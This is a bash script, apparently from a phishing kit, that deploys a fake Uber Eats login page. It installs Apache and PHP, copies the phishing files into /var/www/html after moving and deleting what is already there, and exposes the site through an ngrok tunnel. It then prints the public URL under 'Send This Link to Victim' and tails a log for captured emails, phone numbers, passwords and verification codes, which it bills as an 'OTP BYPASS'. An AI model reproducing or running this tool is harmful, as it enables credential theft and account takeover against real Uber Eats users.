Path: blob/master/sites/UberEats-Phishing/Uber-eats.sh
937 views
#!/bin/bash12stop() {34checkngrok=$(ps aux | grep -o "ngrok" | head -n1)5if [[ $checkngrok == *'ngrok'* ]]; then6pkill -f -2 ngrok > /dev/null 2>&17killall -2 ngrok > /dev/null 2>&18fi9if [[ -e sendlink ]]; then10rm -rf sendlink11fi1213}141516sleep 217# spinner18spinlong ()19{20bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++"21barlenght=${#bar}22i=o23while ((i < 100 )); do24n=$((i*barlenght / 100 ))25printf "\e[00;32m\r[%-${barlenght}s]\e[00m" "${bar:0:n}"26((i += RANDOM%5+2))27sleep 0.428done29}303132#clolors33white='\e[1;37m'34green='\e[0;32m'35blue='\e[1;34m'36red='\e[1;31m'37yellow='\e[1;33m'38echo ""39echo ""40clear41echo""42echo -e $green " ╦ ╦┌┐ ┌─┐┬─┐╔═╗┌─┐┌┬┐┌─┐ ╔═╗┬ ┬┬┌─┐┬ ┬┬┌┐┌┌─┐ "43echo -e $green " ║ ║├┴┐├┤ ├┬┘║╣ ├─┤ │ └─┐───╠═╝├─┤│└─┐├─┤│││││ ┬ "44echo -e $green " ╚═╝└─┘└─┘┴└─╚═╝┴ ┴ ┴ └─┘ ╩ ┴ ┴┴└─┘┴ ┴┴┘└┘└─┘ "45echo -e $white " +++++++++++++++++ OTP BYPASS ++++++++++++++++++ "4647echo ""48echo ""49echo -e $'\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m]\e[0m\e[1;32m >> DOWNLOAD REQUIREMENTS >> \e[0m'50sleep 251echo""52sudo apt-get install apache253apt install php54apt install jq55apt install tail56apt install curl57systemctl start apache258apt install xterm59apt install gnome-terminal60systemctl restart apache2.service61mkdir /var62mkdir /var/www63mkdir /var/www/html64mv /var/www/html/* /var/www/65rm -rf /var/www/html/*66cp -R * /var/www/html/67cd ..68clear69cd /var/www/html/70chmod +x *71chmod 7777 *72sleep 373clear74./ngrok http 80 > /dev/null &7576echo ""77echo -e $'\e[1;31m[\e[0m\e[1;77m+\e[0m\e[1;33m]\e[0m\e[1;92m >> WAIT FOR NGROK UP !\e[0m'78sleep 2579echo ""80clear81./Logo.sh82echo ""83echo -e $yellow "// [ Send This Link to Victim ] //"84echo ""85echo -e $white86curl -s localhost:4040/api/tunnels | jq -r .tunnels[1].public_url87curl -s localhost:4040/api/tunnels | jq -r .tunnels[0].public_url88echo ""89echo ""90echo -e $green "// [ CREDENTIAL ] //"91echo ""92tail -f log.txt | grep -e "Email_or_Phone" -e "password" -e "verificationCode"93949596;;979899100